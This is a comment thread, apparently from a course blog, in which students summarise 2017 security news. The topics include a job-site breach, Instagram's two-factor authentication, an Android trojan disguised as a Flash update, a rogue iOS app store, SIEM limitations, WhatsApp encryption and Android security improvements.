AJL said on March 21 that names, birthdates, and Social Security Numbers of applicants from Alabama, Arizona, Arkansas, Idaho, Delaware, Illinois, Kansas, Maine, Oklahoma, and Vermont were illegally accessed by an outside source. It explained that the code misconfiguration was introduced into the system through an update last October.
AJL is currently working with the FBI to apprehend the hacker while a forensic firm is carrying out a detailed examination of the hacked accounts.
March 26, 2017 at 8:10 pm
Thanking for sharing, minghu
About 1.4 million job seekers in Illinois may have had their personal information compromised when one of the state’s employment security agency vendors was hacked, the governor’s office said Friday. The hacker may have accessed the names, Social Security numbers and birth dates of job seekers in the vendor’s database. The Illinois Department of Employment Security notified the state’s General Assembly about the hack, Gov. Bruce Rauner’s administration said.
March 26, 2017 at 6:46 pm
Instagram Adds Two-Factor Authentication
Instagram became the latest in a long line of services over the years to offer users two-factor authentication this week.
Kevin Systrom, co-founder and CEO of the Facebook-owned mobile photo-sharing app announced the feature on its blog Thursday afternoon. With the feature – accessible via Settings -> Two-Factor Authentication – users will be prompted to enter a code, delivered via SMS, every time they log in.
At first glance Instagram’s two-factor authentication mechanism is slightly more intuitive than others. Upon turning the feature on, Instagram also supplies users with five different backup security codes in case a user can’t receive a security code by text. The codes – sets of eight digits – can also be used if a user’s phone has been stolen, compromised, or misplaced. The service automatically saves a screenshot of the codes to the user’s Photos section of their phone and also allows users to copy the codes to the device’s clipboard.
Two-factor authentication has become fairly ubiquitous over the last several years. Google was one of the first companies to deploy it when it added a two-factor mechanism to its Google Apps offerings way back in 2010. Facebook introduced its version, Login Approvals, in 2011; Twitter added a mechanism for 2FA in 2013.
Given Facebook’s robust security settings, it was about time that Instagram, which Facebook acquired for $1 billion back in 2012, caught up. Many social media sites, Facebook in particular, have been keen on giving users an increasing number of options when it comes to logging into their services securely.
The company unveiled Code Generator, part of Login Approvals, several years ago. The service randomly generates six-digit security codes every 30 seconds that users can enter to access their account in the event they don’t have mobile service. The service can also be used to reset a user’s password. The company began offering users another service, Delegated Recovery, earlier this year. The feature gives users a mechanism similar to 2FA to set up an encrypted recovery token for sites like GitHub, and store it with Facebook.
“An email address alone can’t provide the same level of two-factor authentication to recover access,” Facebook security engineer Brad Hill said of the feature at the time.
Earlier this year the company began allowing users to tie a physical security key, like a Yubikey, to their accounts, for an added layer of security, as well.
March 26, 2017 at 10:13 pm
Hey Zhengshu, thanks for sharing this article about the current update on Instagram! Even though I am not an Instagram user, offering the two factor authentication is definitely a smart move to protect the users. As you said, it added another layer of security, the users also can easily recover their passwords through the token sent via phone or email.
March 26, 2017 at 7:56 pm
New Android trojan mimics user clicks to download dangerous malware
Android users have been exposed to a new malicious app imitating Adobe Flash Player that serves as a potential entrance for many types of dangerous malware. The application, detected by ESET security software as Android/TrojanDownloader.Agent.JI, tricks its victims into granting it special permissions in the Android accessibility menu and uses these to download and execute additional malware of the attackers’ choice.
According to our analysis, the trojan targets devices running Android, including the latest versions. It is distributed via compromised websites – adult video sites, but also via social media. Under the pretense of safety measures, the websites lure users into downloading a fake Adobe Flash Player update. If victims fall for the legitimate-looking update screen and runs the installation, they have more deceptive screens to look forward to.
Fangzhou Hou says
March 26, 2017 at 7:57 pm
“Third-Party App Store Slips Inside iOS App Store”
A third-party app store application managed to slip into the official iOS App Store by masquerading as a legitimate financial helper application, according to Trend Micro researchers.
Dubbed “Household Accounts App” and claiming to be a financial helper app for families, the application is designed with Japanese characters, but the app store it leads to is written in Mandarin Chinese. The researcher discovered the program in the App Store of multiple countries and couldn’t determine exactly who it targets.
When launched for the first time, the application checks the PPAASSWOpenKey key in the system’s user preference plist, which allows it to determine if it has run before, because the key doesn’t exist if it hasn’t, the researchers explain. Next, the app switches to the else branch, which requests the right to use data to access the third-party store, but the user has to approve the request.
The third-party store can be used to install not only applications in the official iOS App Store, but also those that are distributed via unofficial channels, thus potentially exposing users to mobile malware and other unwanted applications. One of the programs distributed via this portal is “PG Client,” a tool for jailbreaking iOS devices.
In addition to this third-party store, the security researchers found a program designed to promote applications already in the App Store. Dubbed “LoveApp”, the software could bypass Apple’s arrangement of apps in searches and the paid Search Ads option and could create revenue by charging developers looking to promote apps without using Apple’s promotion service.
Paul M. Dooley says
March 26, 2017 at 9:58 pm
The amount of events that occur in a typical enterprise environment may seem like an infinite amount to some. One of the biggest challenges in IT security is being able to identify threats and attacks as they occur and not just be reactive in nature and take action once a breach has occurred, if you’re lucky months after the fact, but more likely years after the fact as we’ve seen in recent cases such as the Yahoo breach and many others I could reference. This is where SIEM solutions (Security Information and Event Management) have been adopted, such as the market leader, Splunk, which we are about to dive into this half of the semester. This gave Info-Sec professionals the unique ability to me more proactive in their fight against attacks and be able to make intelligent decisions based on the various events that have been being logged forever but the amount of data to sift through may as well have made it unusable. SIEM allowed people to pump all that aggregated data into the system and the output would be functional information that would identify threats and you could take intelligent actions against an attack that otherwise would have been lost unless you got lucky finding a trace of an attack where the analogy of needle in a haystack doesn’t give justice. As instrumental in the battle between good and bad as SIEM solutions have been, there apparently is a gap with specific types of attacks as they’ve become more sophisticated, which has been and will be the tale of cat and mouse between technology good guys and bad guys. For example, SIEM solutions are not effective in identifying identity-based threats, such as hackers impersonating people on corporate networks, or rogue employees stealing data. This is a common problem with any type of information security solution though. The good guys are always going to be 1 step behind the bad guys. Until a new attack happens, no one is investing in a solution to prevent them from happening. Experts are saying that the main weakness with the current state of SIEM is that it relies on a dedicated team to maximize the effectiveness of this tool. The market is asking for more artificial intelligence to be built into the tool to make it more effective and more effective against more threats. IoT is a threat because while our computer systems are pretty well locked down in most enterprises that invest and care of information security because it creates an avenue to access the network through these connected devices such as cameras, bluetooth tools, etc. Also, while SIEM has opened up the ability to interpret massive amounts of data, the combination of Cloud and IoT means that it will need to keep growing to be able to handle substantially more amounts of data and need an never ending supply of bandwidth to do so.
March 26, 2017 at 11:21 pm
“UK: Attacker used WhatsApp, firm must help police get access”
WhatsApp took a lot of heat for not encyrpting their users messages and implemented it in all communications last year. This has now created an issue where the recent terrorist attack in the U.K. was found to have sent a message using WhatsApp recently. The attacker was shot dead at the scene so he cannot be asked to unlock the messages. Home Secretary Amber Rudd went on television to request that all companies enable a backdoor for intelligence agencies.
This parallels similar cases such as the FBI trying to crack the iPhone of the San Bernadino attacker. The FBI was going to force Apple to break the phone’s encryption but were able to hire a firm to access the content another way.
The British attacker is believed to have been a lone attacker but the messages could show if he had help or not as accomplices may flee the country or attempt attacks of their own potentially.
March 27, 2017 at 12:15 am
Security Improvements Make Android More Attractive to Business
Accepting Android as a staff BYOD (Bring Your Own Device) option has always been tempered by security officers’ understanding that it is less secure than iOS. In the last year, Google has made serious efforts to reduce that perception. The Android Security 2016 Year in Review report (PDF), published this week by Google, describes two areas the company has particularly improved Android security: updates, and the elimination of malicious apps.
Security updates, or patches, have always been a problem in the Android ecosphere. The difficulty is the sheer number of different Android manufacturers involved; some of whom rarely distribute the monthly updates provided by Google. Over the last year, Google has worked on improving this. It has concentrated on two areas: improving the discovery and responsible disclosure of vulnerabilities in its partners’ products; and improving the speed and regularity of device patching.
Android Smartphone in BusinessIt has achieved what can be described as partial success. “As of December 2016,” says the report, “735 million Android devices report a 2016 security patch level.” The downside is it still leaves a similar number that did not. Nevertheless, “Over the course of the year, Android device manufacturers became more efficient at delivering monthly security updates, including expanding their security programs to accept and address security vulnerabilities specific to their devices.”
New models of Google’s own products, Pixel and Nexus, and several of the major manufacturers such as Samsung and LG, have introduced automatic updating. At the end of 2016, Android 7.1.1 introduced new features to improve updating generally with automatic updates.
Google also improved its ability to detect and remove potentially harmful apps (PHAs), such as trojans, spyware and phishing apps, both on the device and from within the Google Play Store. “The goal,” says Google, “is to provide the right protection at the moment it is needed by the user.” During 2016, Google’s security services performed over 790 million device security scans daily, covering phones, tablets, watches and TVs. This is up from around 450 million in the previous year.
Similar attention is given to the apps in Google Play, and PHA installations from Play have fallen dramatically: trojan installs fell by 51.5%, hostile downloaders by 54.6%, backdoors by 30.5%, and phishing apps by 73.4%. “By the end of 2016,” claims Google, “only 0.05 percent of devices that downloaded apps exclusively from Play contained a PHA; down from 0.15 percent in 2015.”
You must be logged in to post a comment.